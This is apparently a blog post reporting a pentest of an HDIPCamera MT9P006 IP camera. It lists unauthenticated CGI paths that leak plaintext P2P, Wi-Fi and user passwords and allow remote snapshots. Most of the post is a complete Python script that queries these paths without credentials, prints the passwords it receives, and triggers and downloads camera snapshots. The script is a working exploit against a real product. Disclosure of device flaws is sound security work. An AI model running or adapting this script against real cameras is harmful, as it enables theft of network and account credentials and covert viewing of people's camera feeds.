I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
By just examining the source I found a few unprotected CGI requests.
A few important CGI requests can be used without any authorisation, so anyone who can reach the camera's web interface can read the values shown below.
First, getting some basic info:
var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx"; var model="RT_IPC"; var hardVersion="5300-mt9p006"; var softVersion="V2.3.5.2505-S50-SMA-B20151204B"; var ipcname="IPCAM"; var startdate="2016-8-30 21:56:44"; var runtimes="0 day, 1:58"; var sdstatus="out"; var sdfreespace="0 "; var sdtotalspace="0 "; var builddate="Dec 4 2015 "; var productmodel="null"; var vendor="RTJ"; var swver=""; var hwver=""; var mppver="mpp";
P2P info
var p2p_enable = "1"; var p2p_id = "PPIV-xxxxx-WZDZZ"; var p2p_pwd = "xxx";
Wifi info
var wifissid = "xxx"; var wifikeytype = "3"; var wifiwhichkey = "0"; var wifikey="xxxxxxxxxxxxxxxx"; var wifienable="0"; var wifimac="xx:xx:xx:xx:xx:xx"; var wifienable="0"; var linkstatus="0"; var linkssid=""; var wifimode="";
rtsp info
var rtsplisnport="554"; var onvif_http_port="1018"; var rtsp_user_verify="0";
User info (including passwords, returned in plaintext)
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="xxx"; var password2="xxx"; var authLevel2="3"; var name3="xxx"; var password3="xxx"; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";
It’s getting even better.
A world-readable URL with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path="/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg"
.. a freshly made snapshot.
I wrote a Python script that calls these CGIs and prints all the info they return.
It can also trigger a snapshot and save it locally.
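#!/bin/python
# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers
#
# Targets Python 2.7 (urllib2, argparse). Every request is a plain HTTP GET
# sent without credentials; the responses are printed verbatim and, per the
# option help texts, can include the P2P, Wi-Fi and account passwords.
import argparse
import os
import re
import urllib
import urllib2

# CGI paths queried on the camera's web server.
p2p = "/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi = "/cgi-bin/getwifiattr.cgi"
rtsp = "/cgi-bin/hi3510/getrtsplisnport.cgi"
snap = "/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir = "/tmpfs/snap_tmpfs/"
users = "/web/cgi-bin/hi3510/param.cgi?cmd=getuser"

# Seconds to wait on a request, so an unresponsive device cannot hang the run.
_HTTP_TIMEOUT = 10


def _fetch(ip, path):
    """Return the raw response body of an HTTP GET for *path* on host *ip*."""
    req = urllib2.Request("http://" + ip + path)
    response = urllib2.urlopen(req, timeout=_HTTP_TIMEOUT)
    try:
        return response.read()
    finally:
        response.close()


def _local_snapshot_name(remote_path):
    """Derive the local file name for the snapshot found at *remote_path*.

    *remote_path* is taken from the device's response and is therefore
    untrusted. Only the final path component of the matched name is kept, so
    a response containing directory separators cannot make the script write
    outside the current working directory.

    Raises:
        ValueError: if no ``IMG_...jpg`` name is present in *remote_path*.
    """
    match = re.search(r"IMG_(.*).jpg", remote_path)
    if match is None:
        raise ValueError("no snapshot file name in %r" % remote_path)
    return os.path.basename(match.group(0))


def get_param():
    """Parse the command line and return the argparse namespace.

    ``--ip`` is required; the remaining options are boolean switches that
    select which requests main() performs.
    """
    print("./IPcam_5300-mt9p006.py -h for cmd options")
    # Created outside the try block so the except handler can always use it.
    parser = argparse.ArgumentParser()
    try:
        parser.add_argument("--ip", dest="ip", default="",
                            help="ip adres", required=True)
        parser.add_argument("--snapshot", dest="snapshot", action="store_true",
                            help="make and download snapshot")
        parser.add_argument("--getp2p", dest="getp2p", action="store_true",
                            help="get p2p info (incl. password)")
        parser.add_argument("--getwifi", dest="getwifi", action="store_true",
                            help="get wifi info (incl. password)")
        parser.add_argument("--getrtsp", dest="getrtsp", action="store_true",
                            help="get rtsp info")
        parser.add_argument("--getusers", dest="getusers", action="store_true",
                            help="get user info (incl. passwords)")
        return parser.parse_args()
    except IOError as msg:
        parser.error(str(msg))


def main():
    """Run the requests selected on the command line and print the results."""
    params = get_param()

    if params.snapshot:
        # call cgi to make snapshot and save to local drive
        print("make and download snapshot\n")
        url_data = _fetch(params.ip, snap)
        match = re.search(r"/(.*)", url_data)
        if match is None:
            raise ValueError("no snapshot path in response %r" % url_data)
        # remove last 2 char " and \n
        snapfile_path = match.group(0)[:-2]
        snap_filename = _local_snapshot_name(snapfile_path)
        print("Snap file url: %s" % snapfile_path)
        print("Save output to: %s " % snap_filename)
        # Download first, so a failed request does not leave an empty file.
        image = _fetch(params.ip, snapfile_path)
        with open(snap_filename, "wb") as f:
            f.write(image)

    # The remaining options each print one CGI response unmodified.
    queries = (
        (params.getp2p, "Get p2p info", p2p),
        (params.getwifi, "Get wifi info", wifi),
        (params.getrtsp, "Get rtsp info", rtsp),
        (params.getusers, "Get users info", users),
    )
    for selected, label, path in queries:
        if selected:
            print(label)
            print(_fetch(params.ip, path))


if __name__ == "__main__":
    main()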